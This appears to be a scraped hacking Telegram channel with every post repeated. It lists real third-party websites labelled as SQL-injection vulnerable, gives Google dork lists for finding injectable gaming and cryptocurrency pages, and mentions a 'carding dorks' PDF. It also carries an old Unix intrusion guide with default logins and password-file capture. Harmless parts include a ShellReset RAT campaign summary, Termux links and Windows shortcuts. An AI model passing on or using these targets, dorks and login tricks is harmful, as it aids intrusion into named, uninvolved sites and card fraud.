Forwarded from Backup Legal Mega
Latest Carding Dorks List for Sql Injection 2019.pdf
324.1 KB
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Fresh SQLi Vulnerable Websites List :
-git sources 2020 :
http://www.estudanky.eu/poi.php?id=9344
http://www.oldgame.cz/nefunkcni_download.php?id=
http://www.sumava-zadov.cz/fotogalerie.php?id=22
http://www.oldgame.cz/download.php?id=341
http://www.stavebni-prace-plzen.cz/pdf.php?id=9
http://www.strechysimon.cz/zakazka.php?id=27
http://www.sumava-zadov.cz/fotogalerie.php?id=9
http://www.strechysimon.cz/zakazka.php?id=5
http://teamaero.pjz.cz/aktuality.php?id=193
http://www.oldgame.cz/nefunkcni_download.php?id=
http://www.sumava-zadov.cz/fotogalerie.php?id=22
http://www.oldgame.cz/download.php?id=341
http://www.stavebni-prace-plzen.cz/pdf.php?id=9
http://www.strechysimon.cz/zakazka.php?id=27
http://www.smelisting.net/corner_category.php?id=7
http://www.smelisting.net/corner_category.php?id=15
http://www.psukhabar.com/ReadArticle.php?id=1128&table=whispers
http://www.psukhabar.com/ReadArticle.php?id=1126&table=whispers
http://www.psukhabar.com/ReadArticle.php?id=1128&table=whispers
http://www.psukhabar.com/ReadArticle.php?id=1126&table=whispers
http://www.sumava-zadov.cz/fotogalerie.php?id=9
http://geca.ac.in/departments/department.php?id=5
http://www.geca.ac.in/departments/achivement.php?id=1
http://www.harmanindia.com/products-details.php?id=163&cats=Nail%20Polish%20
Bottle%20Caps
http://www.harmanindia.com/products-details.php?id=163&cats=Nail%20Polish%20
Bottle%20Caps
http://www.strechysimon.cz/zakazka.php?id=5
http://teamaero.pjz.cz/aktuality.php?id=193
http://www.sumava-zadov.cz/fotogalerie.php?id=22
http://www.oldgame.cz/download.php?id=341
http://www.stavebni-prace-plzen.cz/pdf.php?id=9
http://www.strechysimon.cz/zakazka.php?id=27
http://www.sumava-zadov.cz/fotogalerie.php?id=9
http://www.strechysimon.cz/zakazka.php?id=5
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Fresh SQLi Vulnerable Websites List :
-git sources 2020 :
http://www.estudanky.eu/poi.php?id=9344
http://www.oldgame.cz/nefunkcni_download.php?id=
http://www.sumava-zadov.cz/fotogalerie.php?id=22
http://www.oldgame.cz/download.php?id=341
http://www.stavebni-prace-plzen.cz/pdf.php?id=9
http://www.strechysimon.cz/zakazka.php?id=27
http://www.sumava-zadov.cz/fotogalerie.php?id=9
http://www.strechysimon.cz/zakazka.php?id=5
http://teamaero.pjz.cz/aktuality.php?id=193
http://www.oldgame.cz/nefunkcni_download.php?id=
http://www.sumava-zadov.cz/fotogalerie.php?id=22
http://www.oldgame.cz/download.php?id=341
http://www.stavebni-prace-plzen.cz/pdf.php?id=9
http://www.strechysimon.cz/zakazka.php?id=27
http://www.smelisting.net/corner_category.php?id=7
http://www.smelisting.net/corner_category.php?id=15
http://www.psukhabar.com/ReadArticle.php?id=1128&table=whispers
http://www.psukhabar.com/ReadArticle.php?id=1126&table=whispers
http://www.psukhabar.com/ReadArticle.php?id=1128&table=whispers
http://www.psukhabar.com/ReadArticle.php?id=1126&table=whispers
http://www.sumava-zadov.cz/fotogalerie.php?id=9
http://geca.ac.in/departments/department.php?id=5
http://www.geca.ac.in/departments/achivement.php?id=1
http://www.harmanindia.com/products-details.php?id=163&cats=Nail%20Polish%20
Bottle%20Caps
http://www.harmanindia.com/products-details.php?id=163&cats=Nail%20Polish%20
Bottle%20Caps
http://www.strechysimon.cz/zakazka.php?id=5
http://teamaero.pjz.cz/aktuality.php?id=193
http://www.sumava-zadov.cz/fotogalerie.php?id=22
http://www.oldgame.cz/download.php?id=341
http://www.stavebni-prace-plzen.cz/pdf.php?id=9
http://www.strechysimon.cz/zakazka.php?id=27
http://www.sumava-zadov.cz/fotogalerie.php?id=9
http://www.strechysimon.cz/zakazka.php?id=5
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
www.estudanky.eu
eSTUDΓNKY | NΓ‘rodnΓ registr pramenΕ― a studΓ‘nek
studΓ‘nka Pod Ε indelnΓΊ | ZlΓnskΓ½ kraj | okres UherskΓ© HradiΕ‘tΔ | obec KoΕ‘Γky | NΓ‘rodnΓ registr pramenΕ― a studΓ‘nek | MladΓ ochrΓ‘nci pΕΓrody
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Hq gaming dorks :
nami //php= + site:top
"assasin" + "newbie" / ?php=avd + site:tt
FarmingSimulator / php?avd= site:wed
Xbox //php= + site:click
TreeofSavior / php?productid= site:garden
allintext: ".re" + "PCGaming"
FarmingSimulator / GrimDawn / ?php= + site:equipment
Depth .php?productid = site:kw
"wukong" avd?id= site:fail
"TamrielUnlimited" sec?id= site:gt
intext: ".airforce" + "Launch"
game / php?param= site:software
huehuehuehue .php?productid = site:link
ekko //php= + site:degree
professionalgaming .php?productid = site:plumbing
"np" itemid?id= site:ax
waiths / darius / ?php= + site:voting
source: ".uz" + "Competitive"
soloqueue .php?sec = site:garden
"Medieval2" + "esports" / ?php=loginid + site:rentals
"JustSurvive" pageid?id= site:fj
ShakesandFidget //php= + site:dance
ryse .php?coID = site:sr
bait .php?id = site:rich
Rhythm / php?loginid= site:fish
overextending / php?param= site:mo
Ragnarok //php= + site:nl
inurl: ".taxi" + "powerstargold"
"Masterrace" id?id= site:wedding
"suppress" itemid?id= site:supply
anivia //php= + site:edu
HeartsofIron .php?avd = site:bq
snowballing / bot / ?php= + site:limited
FlightSimulator //php= + site:be
huehuehuehue / php?panel= site:ooo
shaco //php= + site:gn
"riseofthetombraider" + "powerstargold" / ?php=id + site:supply
Gratis //php= + site:host
Evolve / Deadbydaylight / ?php= + site:graphics
SaintsRow / JRPG / ?php= + site:garden
AdVentureCapitalist / ShopHeroes / ?php= + site:gf
trundle .php?itemid = site:se
location: ".do" + "WP"
"inside" sec?id= site:menu
udraw / microsoft / ?php= + site:my
"metagame" productid?id= site:ir
filetype: ".mz" + "screamride"
"Trove" + "PathofExile" / ?php=sec + site:blue
allintitle: ".technology" + "malzahar"
exergaming / php?id= site:estate
Cheats / teamfortess / ?php= + site:cc
"wireless" + "windows" / ?php=userid + site:hosting
fighterwithin / php?purchaseid= site:reviews
"SHOGUN2" + "Gaben" / ?php=productid + site:tp
jayce / deny / ?php= + site:bt
"messengerkit" + "kinectsports" / ?php=userid + site:im
source: ".at" + "Action"
mediaremote .php?itemid = site:sd
deadrising / php?cat= site:today
xboxone / php?sec= site:diamonds
seaofthieves //php= + site:feedback
splitpush //php= + site:camp
Console / deadrising / ?php= + site:tt
Fallout4 / php?cat= site:ug
evelynn .php?loginid = site:feedback
"omw" itemid?id= site:luxury
debuff .php?id = site:press
acecombat6 //php= + site:estate
freeskins / php?cat= site:country
inurl: ".cruises" + "karma"
"poppy" panel?id= site:tennis
id: ".eat" + "inside"
Mechanical / Evolve / ?php= + site:partners
"carry" + "durable" / ?php=id + site:ni
SunsetOverdrive //php= + site:museum
> git sources :
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Hq gaming dorks :
nami //php= + site:top
"assasin" + "newbie" / ?php=avd + site:tt
FarmingSimulator / php?avd= site:wed
Xbox //php= + site:click
TreeofSavior / php?productid= site:garden
allintext: ".re" + "PCGaming"
FarmingSimulator / GrimDawn / ?php= + site:equipment
Depth .php?productid = site:kw
"wukong" avd?id= site:fail
"TamrielUnlimited" sec?id= site:gt
intext: ".airforce" + "Launch"
game / php?param= site:software
huehuehuehue .php?productid = site:link
ekko //php= + site:degree
professionalgaming .php?productid = site:plumbing
"np" itemid?id= site:ax
waiths / darius / ?php= + site:voting
source: ".uz" + "Competitive"
soloqueue .php?sec = site:garden
"Medieval2" + "esports" / ?php=loginid + site:rentals
"JustSurvive" pageid?id= site:fj
ShakesandFidget //php= + site:dance
ryse .php?coID = site:sr
bait .php?id = site:rich
Rhythm / php?loginid= site:fish
overextending / php?param= site:mo
Ragnarok //php= + site:nl
inurl: ".taxi" + "powerstargold"
"Masterrace" id?id= site:wedding
"suppress" itemid?id= site:supply
anivia //php= + site:edu
HeartsofIron .php?avd = site:bq
snowballing / bot / ?php= + site:limited
FlightSimulator //php= + site:be
huehuehuehue / php?panel= site:ooo
shaco //php= + site:gn
"riseofthetombraider" + "powerstargold" / ?php=id + site:supply
Gratis //php= + site:host
Evolve / Deadbydaylight / ?php= + site:graphics
SaintsRow / JRPG / ?php= + site:garden
AdVentureCapitalist / ShopHeroes / ?php= + site:gf
trundle .php?itemid = site:se
location: ".do" + "WP"
"inside" sec?id= site:menu
udraw / microsoft / ?php= + site:my
"metagame" productid?id= site:ir
filetype: ".mz" + "screamride"
"Trove" + "PathofExile" / ?php=sec + site:blue
allintitle: ".technology" + "malzahar"
exergaming / php?id= site:estate
Cheats / teamfortess / ?php= + site:cc
"wireless" + "windows" / ?php=userid + site:hosting
fighterwithin / php?purchaseid= site:reviews
"SHOGUN2" + "Gaben" / ?php=productid + site:tp
jayce / deny / ?php= + site:bt
"messengerkit" + "kinectsports" / ?php=userid + site:im
source: ".at" + "Action"
mediaremote .php?itemid = site:sd
deadrising / php?cat= site:today
xboxone / php?sec= site:diamonds
seaofthieves //php= + site:feedback
splitpush //php= + site:camp
Console / deadrising / ?php= + site:tt
Fallout4 / php?cat= site:ug
evelynn .php?loginid = site:feedback
"omw" itemid?id= site:luxury
debuff .php?id = site:press
acecombat6 //php= + site:estate
freeskins / php?cat= site:country
inurl: ".cruises" + "karma"
"poppy" panel?id= site:tennis
id: ".eat" + "inside"
Mechanical / Evolve / ?php= + site:partners
"carry" + "durable" / ?php=id + site:ni
SunsetOverdrive //php= + site:museum
> git sources :
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ btc_dorks :
coinbase news.jsf?Cat=
ethereum devcon.ashx?framecode=
bitcoin miner.bphpx?idproduct=
coinbase deposit fee.cfm?CatalogID=
c bitcoin library.raw?GAMEID=
bitcoin atm.cfm?item=
bitcoin app.flv?GameID=
ethereum dao.File?orderid=
ethereum blue.flv?Action=
ethereum block explorer.File?gpu=
coinbase exchange review.php4?gameid=
ethereum foundation.blog?storeid=
bitcoin buy.tss?PartID=
coinbase and bitcoin gold.pdf?&gametype=
coinbase golemcontact-us?item=
bitcoin explorercfmPageID
bitcoin miner.b.php3?ViewType=
coinbaseblog/?itemid=
bitcoin china.flv?itemid=
coinbase debit card.htm?styleid=
bitcoin dollar.tss?UserID=
ethereum historical price.cfmgrname=
bitcoin cash.php?BookID=
ethereum future price.jsp?shopcd=
ethereum block explorer.ashx?StyleID=
system d bitcoin.raw?gamelink=
ethereum exchangeaspx?ServiceID=
ethereum devcon.jsf?p=
coinbase to add ripple.File?Cat=
ethereum exchange rate.raw?GP=
ethereum alliance members.jsf?gameType=
coinbase credit card limit.ashx?gamereferral=
coinbase gdax fees.html?itemID=
coinbase gdax account.ashx?idproduct=
bitcoin wallet.asp?cartId=
ethereum coin.cfmshopcd=
is coinbase a publicly traded company.php3?iCat=
ethereum gpuevents?gameNo=
coinbase bank account.blog?Cart=
coinbase affiliate.pdf?StyleID=
bitcoin chart.raw?userID=
c bitcoin library.jsf?userID=
coinbase ethereum.php?grname=
bitcoin app.html?keyword=
ethereum dao hack.cfm?StoreId=
what is a coinbase transactioncat/?action=
coinbase bank account.pdf?showtopic=
bitcoin bubbleaspidCategory=
coinbase a paypal.flv?framecode=
ethereum hard forkaspPageID
bitcoin blockchain.php3?gr=
ethereum github.cfmGameName=
ethereum byzantium.flv?articleid=
coinbase emailcontact-us?GP=
coinbase golem.phpid=
coinbase bch.File?orderid=
bitcoin documentaryphpx?itemid=
ethereum hard forkcfmgamerblogid=
coinbase contact.aspitemid=
coinbase forgot passwordsite/?cartId=
coinbase forecast.jsf?designer=
coinbase gdax account.psml?product=
ethereum flash crashaspx?cartid=
capital b bitcoinsite/?code=
c bitcoin wallet.phpgameid=
coinbase a paypal.asp?gamereferral=
bitcoin b font.phtml?Sku=
ethereum byzantium.php?productid=
what is a coinbase transaction.aspx?gamesearch=
bitcoin address lookup.php&GameID=
coinbase founder.phtml?&gametype=
ethereum foundationcfmitemid=
ethereum coin priceaspbookid=
bitcoin c sharp.raw?item=
ethereum founder.html?action=
c bitcoin miner.raw?gamelink=
bitcoin app.php3?keyword=
ethereum a good investmentcontact-us?PageID
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ btc_dorks :
coinbase news.jsf?Cat=
ethereum devcon.ashx?framecode=
bitcoin miner.bphpx?idproduct=
coinbase deposit fee.cfm?CatalogID=
c bitcoin library.raw?GAMEID=
bitcoin atm.cfm?item=
bitcoin app.flv?GameID=
ethereum dao.File?orderid=
ethereum blue.flv?Action=
ethereum block explorer.File?gpu=
coinbase exchange review.php4?gameid=
ethereum foundation.blog?storeid=
bitcoin buy.tss?PartID=
coinbase and bitcoin gold.pdf?&gametype=
coinbase golemcontact-us?item=
bitcoin explorercfmPageID
bitcoin miner.b.php3?ViewType=
coinbaseblog/?itemid=
bitcoin china.flv?itemid=
coinbase debit card.htm?styleid=
bitcoin dollar.tss?UserID=
ethereum historical price.cfmgrname=
bitcoin cash.php?BookID=
ethereum future price.jsp?shopcd=
ethereum block explorer.ashx?StyleID=
system d bitcoin.raw?gamelink=
ethereum exchangeaspx?ServiceID=
ethereum devcon.jsf?p=
coinbase to add ripple.File?Cat=
ethereum exchange rate.raw?GP=
ethereum alliance members.jsf?gameType=
coinbase credit card limit.ashx?gamereferral=
coinbase gdax fees.html?itemID=
coinbase gdax account.ashx?idproduct=
bitcoin wallet.asp?cartId=
ethereum coin.cfmshopcd=
is coinbase a publicly traded company.php3?iCat=
ethereum gpuevents?gameNo=
coinbase bank account.blog?Cart=
coinbase affiliate.pdf?StyleID=
bitcoin chart.raw?userID=
c bitcoin library.jsf?userID=
coinbase ethereum.php?grname=
bitcoin app.html?keyword=
ethereum dao hack.cfm?StoreId=
what is a coinbase transactioncat/?action=
coinbase bank account.pdf?showtopic=
bitcoin bubbleaspidCategory=
coinbase a paypal.flv?framecode=
ethereum hard forkaspPageID
bitcoin blockchain.php3?gr=
ethereum github.cfmGameName=
ethereum byzantium.flv?articleid=
coinbase emailcontact-us?GP=
coinbase golem.phpid=
coinbase bch.File?orderid=
bitcoin documentaryphpx?itemid=
ethereum hard forkcfmgamerblogid=
coinbase contact.aspitemid=
coinbase forgot passwordsite/?cartId=
coinbase forecast.jsf?designer=
coinbase gdax account.psml?product=
ethereum flash crashaspx?cartid=
capital b bitcoinsite/?code=
c bitcoin wallet.phpgameid=
coinbase a paypal.asp?gamereferral=
bitcoin b font.phtml?Sku=
ethereum byzantium.php?productid=
what is a coinbase transaction.aspx?gamesearch=
bitcoin address lookup.php&GameID=
coinbase founder.phtml?&gametype=
ethereum foundationcfmitemid=
ethereum coin priceaspbookid=
bitcoin c sharp.raw?item=
ethereum founder.html?action=
c bitcoin miner.raw?gamelink=
bitcoin app.php3?keyword=
ethereum a good investmentcontact-us?PageID
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ShellReset RAT utilizes word documents based on malicious macros to spread :
1) From February to May 2020, we observed that four new Microsoft Word documents based on malicious macros were hosted on new registration sites based on .space and .xyz domains. Because the deployment strategy, technology, and process (TTP) of the final payload of several documents are very similar, we believe this is the behavior of the same attacker.
2) It is understood that the final version of the .NET payload has never been detected before. Its code segment is small and overlaps with QuasarRAT, but this code segment is not used at runtime. Based on the unique string in the final payload, we named the RAT ShellReset. Due to the limited number of detections, we believe this may be a small-scale attack activity, and the themes used by the attackers in this attack process are also related to the hot events in London this year, including 5G Expo and Futurebuild .
3) The infection chain involved some interesting techniques, such as using trusted Windows utilities to compile the payload on the terminal at runtime to bypass the security mechanism, and downloading the obfuscated source code from the attackerβs server. In this article, I will analyze the distribution strategy and attack technology in detail.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ShellReset RAT utilizes word documents based on malicious macros to spread :
1) From February to May 2020, we observed that four new Microsoft Word documents based on malicious macros were hosted on new registration sites based on .space and .xyz domains. Because the deployment strategy, technology, and process (TTP) of the final payload of several documents are very similar, we believe this is the behavior of the same attacker.
2) It is understood that the final version of the .NET payload has never been detected before. Its code segment is small and overlaps with QuasarRAT, but this code segment is not used at runtime. Based on the unique string in the final payload, we named the RAT ShellReset. Due to the limited number of detections, we believe this may be a small-scale attack activity, and the themes used by the attackers in this attack process are also related to the hot events in London this year, including 5G Expo and Futurebuild .
3) The infection chain involved some interesting techniques, such as using trusted Windows utilities to compile the payload on the terminal at runtime to bypass the security mechanism, and downloading the obfuscated source code from the attackerβs server. In this article, I will analyze the distribution strategy and attack technology in detail.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦LINUX BEGINERS TIPS :
NOTE: DUE TO THE MANY DIFFERENT
VERSIONS OF UNIX (BERKLEY UNIX,
BELL SYSTEM III, AND SYSTEM V
THE MOST POPULAR) MANY COMMANDS
FOLLOWING MAY/MAY NOT WORK. I HAVE
WRITTEN THEM IN SYSTEM V ROUTINES.
UNIX/XENIX OPERATING SYSTEMS WILL
BE CONSIDERED IDENTICAL SYSTEMS BELOW.
HOW TO TELL IF/IF NOT YOU ARE ON A
UNIX SYSTEM: UNIX SYSTEMS ARE QUITE
COMMON SYSTEMS ACROSS THE COUNTRY.
THEIR SECURITY APPEARS AS SUCH:
LOGIN; (OR LOGIN;)
PASSWORD:
WHEN HACKING ON A UNIX SYSTEM IT IS
BEST TO USE LOWERCASE BECAUSE THE UNIX
SYSTEM COMMANDS ARE ALL DONE IN LOWER-
CASE.
LOGIN; IS A 1-8 CHARACTER FIELD. IT IS
USUALLY THE NAME (I.E. JOE OR FRED)
OF THE USER, OR INITIALS (I.E. J.JONES
OR F.WILSON). HINTS FOR LOGIN NAMES
CAN BE FOUND TRASHING THE LOCATION OF
THE DIAL-UP (USE YOUR CN/A TO FIND
WHERE THE COMPUTER IS).
PASSWORD: IS A 1-8 CHARACTER PASSWORD
ASSIGNED BY THE SYSOP OR CHOSEN BY THE
USER.
COMMON DEFAULT LOGINS
--------------------------
LOGIN; PASSWORD:
ROOT ROOT,SYSTEM,ETC..
SYS SYS,SYSTEM
DAEMON DAEMON
UUCP UUCP
TTY TTY
TEST TEST
UNIX UNIX
BIN BIN
ADM ADM
WHO WHO
LEARN LEARN
UUHOST UUHOST
NUUCP NUUCP
IF YOU GUESS A LGIN NAME AND YOU ARE
NOT ASKED FOR A PASSWORD, AND HAVE
ACCESSED TO THE SYSTEM, THEN YOU HAVE
WHAT IS KNOWN AS A NON-GIFTED ACCOUNT.
IF YOU GUESS A CORRECT LOGIN AND PASS-
WORD, THEN YOU HAVE A USER ACCOUNT.
AND, IF YOU GUESS THE ROOT PASSWORD,
THEN YOU HAVE A "SUPER-USER" ACCOUNT.
ALL UNIX SYSTEMS HAVE THE FOLLOWING
INSTALLED TO THEIR SYSTEM:
ROOT, SYS, BIN, DAEMON, UUCP, ADM
ONCE YOU ARE IN THE SYSTEM, YOU WILL
GET A PROMPT. COMMON PROMPTS ARE:
$
%
#
BUT CAN BE JUST ABOUT ANYTHING THE
SYSOP OR USER WANTS IT TO BE.
THINGS TO DO WHEN YOU ARE IN: SOME
OF THE COMMANDS THAT YOU MAY WANT TO
TRY FOLLOW BELOW:
WHO IS ON (SHOWS WHO IS CURRENTLY
LOGGED ON THE SYSTEM.)
WRITE NAME (NAME IS THE PERSON YOU
WISH TO CHAT WITH)
TO EXIT CHAT MODE TRY CTRL-D.
EOT=END OF TRANSFER.
LS -A (LIST ALL FILES IN CURRENT
DIRECTORY.)
DU -A (CHECKS AMOUNT OF MEMORY
YOUR FILES USE;DISK USAGE)
CD\NAME (NAME IS THE NAME OF THE
SUB-DIRECTORY YOU CHOOSE)
CD\ (BRINGS YOUR HOME DIRECTORY
TO CURRENT USE)
CAT NAME (NAME IS A FILENAME EITHER
A PROGRAM OR DOCUMENTATION
YOUR USERNAME HAS WRITTEN)
MOST UNIX PROGRAMS ARE WRITTEN
IN THE C LANGUAGE OR PASCAL
SINCE UNIX IS A PROGRAMMERS'
ENVIRONMENT.
ONE OF THE FIRST THINGS DONE ON THE
SYSTEM IS PRINT UP OR CAPTURE (IN A
BUFFER) THE FILE CONTAINING ALL USER
NAMES AND ACCOUNTS. THIS CAN BE DONE
BY DOING THE FOLLOWING COMMAND:
CAT /ETC/PASSWD
IF YOU ARE SUCCESSFUL YOU WILL A LIST
OF ALL ACCOUNTS ON THE SYSTEM. IT
SHOULD LOOK LIKE THIS:
ROOT:HVNSDCF:0:0:ROOT DIR:/:
JOE:MAJDNFD:1:1:JOE COOL:/BIN:/BIN/JOE
HAL::1:2:HAL SMITH:/BIN:/BIN/HAL
THE "ROOT" LINE TELLS THE FOLLOWING
INFO :
LOGIN NAME=ROOT
HVNSDCF = ENCRYPTED PASSWORD
0 = USER GROUP NUMBER
0 = USER NUMBER
ROOT DIR = NAME OF USER
/ = ROOT DIRECTORY
IN THE JOE LOGIN, THE LAST PART
"/BIN/JOE " TELLS US WHICH DIRECTORY
IS HIS HOME DIRECTORY (JOE) IS.
IN THE "HAL" EXAMPLE THE LOGIN NAME IS
FOLLOWED BY 2 COLONS, THAT MEANS THAT
THERE IS NO PASSWORD NEEDED TO GET IN
USING HIS NAME.
#git sources
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦LINUX BEGINERS TIPS :
NOTE: DUE TO THE MANY DIFFERENT
VERSIONS OF UNIX (BERKLEY UNIX,
BELL SYSTEM III, AND SYSTEM V
THE MOST POPULAR) MANY COMMANDS
FOLLOWING MAY/MAY NOT WORK. I HAVE
WRITTEN THEM IN SYSTEM V ROUTINES.
UNIX/XENIX OPERATING SYSTEMS WILL
BE CONSIDERED IDENTICAL SYSTEMS BELOW.
HOW TO TELL IF/IF NOT YOU ARE ON A
UNIX SYSTEM: UNIX SYSTEMS ARE QUITE
COMMON SYSTEMS ACROSS THE COUNTRY.
THEIR SECURITY APPEARS AS SUCH:
LOGIN; (OR LOGIN;)
PASSWORD:
WHEN HACKING ON A UNIX SYSTEM IT IS
BEST TO USE LOWERCASE BECAUSE THE UNIX
SYSTEM COMMANDS ARE ALL DONE IN LOWER-
CASE.
LOGIN; IS A 1-8 CHARACTER FIELD. IT IS
USUALLY THE NAME (I.E. JOE OR FRED)
OF THE USER, OR INITIALS (I.E. J.JONES
OR F.WILSON). HINTS FOR LOGIN NAMES
CAN BE FOUND TRASHING THE LOCATION OF
THE DIAL-UP (USE YOUR CN/A TO FIND
WHERE THE COMPUTER IS).
PASSWORD: IS A 1-8 CHARACTER PASSWORD
ASSIGNED BY THE SYSOP OR CHOSEN BY THE
USER.
COMMON DEFAULT LOGINS
--------------------------
LOGIN; PASSWORD:
ROOT ROOT,SYSTEM,ETC..
SYS SYS,SYSTEM
DAEMON DAEMON
UUCP UUCP
TTY TTY
TEST TEST
UNIX UNIX
BIN BIN
ADM ADM
WHO WHO
LEARN LEARN
UUHOST UUHOST
NUUCP NUUCP
IF YOU GUESS A LGIN NAME AND YOU ARE
NOT ASKED FOR A PASSWORD, AND HAVE
ACCESSED TO THE SYSTEM, THEN YOU HAVE
WHAT IS KNOWN AS A NON-GIFTED ACCOUNT.
IF YOU GUESS A CORRECT LOGIN AND PASS-
WORD, THEN YOU HAVE A USER ACCOUNT.
AND, IF YOU GUESS THE ROOT PASSWORD,
THEN YOU HAVE A "SUPER-USER" ACCOUNT.
ALL UNIX SYSTEMS HAVE THE FOLLOWING
INSTALLED TO THEIR SYSTEM:
ROOT, SYS, BIN, DAEMON, UUCP, ADM
ONCE YOU ARE IN THE SYSTEM, YOU WILL
GET A PROMPT. COMMON PROMPTS ARE:
$
%
#
BUT CAN BE JUST ABOUT ANYTHING THE
SYSOP OR USER WANTS IT TO BE.
THINGS TO DO WHEN YOU ARE IN: SOME
OF THE COMMANDS THAT YOU MAY WANT TO
TRY FOLLOW BELOW:
WHO IS ON (SHOWS WHO IS CURRENTLY
LOGGED ON THE SYSTEM.)
WRITE NAME (NAME IS THE PERSON YOU
WISH TO CHAT WITH)
TO EXIT CHAT MODE TRY CTRL-D.
EOT=END OF TRANSFER.
LS -A (LIST ALL FILES IN CURRENT
DIRECTORY.)
DU -A (CHECKS AMOUNT OF MEMORY
YOUR FILES USE;DISK USAGE)
CD\NAME (NAME IS THE NAME OF THE
SUB-DIRECTORY YOU CHOOSE)
CD\ (BRINGS YOUR HOME DIRECTORY
TO CURRENT USE)
CAT NAME (NAME IS A FILENAME EITHER
A PROGRAM OR DOCUMENTATION
YOUR USERNAME HAS WRITTEN)
MOST UNIX PROGRAMS ARE WRITTEN
IN THE C LANGUAGE OR PASCAL
SINCE UNIX IS A PROGRAMMERS'
ENVIRONMENT.
ONE OF THE FIRST THINGS DONE ON THE
SYSTEM IS PRINT UP OR CAPTURE (IN A
BUFFER) THE FILE CONTAINING ALL USER
NAMES AND ACCOUNTS. THIS CAN BE DONE
BY DOING THE FOLLOWING COMMAND:
CAT /ETC/PASSWD
IF YOU ARE SUCCESSFUL YOU WILL A LIST
OF ALL ACCOUNTS ON THE SYSTEM. IT
SHOULD LOOK LIKE THIS:
ROOT:HVNSDCF:0:0:ROOT DIR:/:
JOE:MAJDNFD:1:1:JOE COOL:/BIN:/BIN/JOE
HAL::1:2:HAL SMITH:/BIN:/BIN/HAL
THE "ROOT" LINE TELLS THE FOLLOWING
INFO :
LOGIN NAME=ROOT
HVNSDCF = ENCRYPTED PASSWORD
0 = USER GROUP NUMBER
0 = USER NUMBER
ROOT DIR = NAME OF USER
/ = ROOT DIRECTORY
IN THE JOE LOGIN, THE LAST PART
"/BIN/JOE " TELLS US WHICH DIRECTORY
IS HIS HOME DIRECTORY (JOE) IS.
IN THE "HAL" EXAMPLE THE LOGIN NAME IS
FOLLOWED BY 2 COLONS, THAT MEANS THAT
THERE IS NO PASSWORD NEEDED TO GET IN
USING HIS NAME.
#git sources
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Build Your own termux app :
>Scripts and patches to build packages for the Termux Android application.
1) https://github.com/termux/game-packages
2) https://github.com/termux/science-packages
3) https://github.com/termux/termux-root-packages
4) https://github.com/termux/unstable-packages
5) https://github.com/termux/x11-packages
π¦disabled-packages:
Packages that cannot be published due to serious issues.
ndk-patches: https://github.com/termux/termux-packages/blob/master/disabled-packages
Our changes to Android NDK headers.
packages: https://github.com/termux/termux-packages/blob/master/ndk-patches
Main set of packages.
sample: https://github.com/termux/termux-packages/blob/master/sample
Sample structure for creating new packages.
scripts: https://github.com/termux/termux-packages/blob/master/scripts
Set of utilities and build system scripts.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Build Your own termux app :
>Scripts and patches to build packages for the Termux Android application.
1) https://github.com/termux/game-packages
2) https://github.com/termux/science-packages
3) https://github.com/termux/termux-root-packages
4) https://github.com/termux/unstable-packages
5) https://github.com/termux/x11-packages
π¦disabled-packages:
Packages that cannot be published due to serious issues.
ndk-patches: https://github.com/termux/termux-packages/blob/master/disabled-packages
Our changes to Android NDK headers.
packages: https://github.com/termux/termux-packages/blob/master/ndk-patches
Main set of packages.
sample: https://github.com/termux/termux-packages/blob/master/sample
Sample structure for creating new packages.
scripts: https://github.com/termux/termux-packages/blob/master/scripts
Set of utilities and build system scripts.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - termux/game-packages: Games for Termux
Games for Termux. Contribute to termux/game-packages development by creating an account on GitHub.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:
> For all windows Verisions mostly ...
Windows key + R = Run menu
This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer
ALT + Tab = Switch between windows
ALT, Space, X = Maximize window
CTRL + Shift + Esc = Task Manager
Windows key + Break = System properties
Windows key + F = Search
Windows key + D = Hide/Display all windows
CTRL + C = copy
CTRL + X = cut
CTRL + V = paste
Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.
Keyboard Shortcuts
Alt and Esc Switch between running applications
Alt and letter Select menu item by underlined letter
Ctrl and Esc Open Program Menu
Ctrl and F4 Close active document or group windows (does not work with some applications)
Alt and F4 Quit active application or close current window
Alt and - Open Control menu for active document
Ctrl] Lft., Rt. arrow Move cursor forward or back one word
Ctrl] Up, Down arrow Move cursor forward or back one paragraph
F1 Open Help for active application
Windows+M Minimize all open windows
Shift+Windows+M Undo minimize all open windows
Windows+F1 Open Windows Help
Windows+Tab Cycle through the Taskbar buttons
Windows+Break Open the System Properties dialog box
#git sources
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:
> For all windows Verisions mostly ...
Windows key + R = Run menu
This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
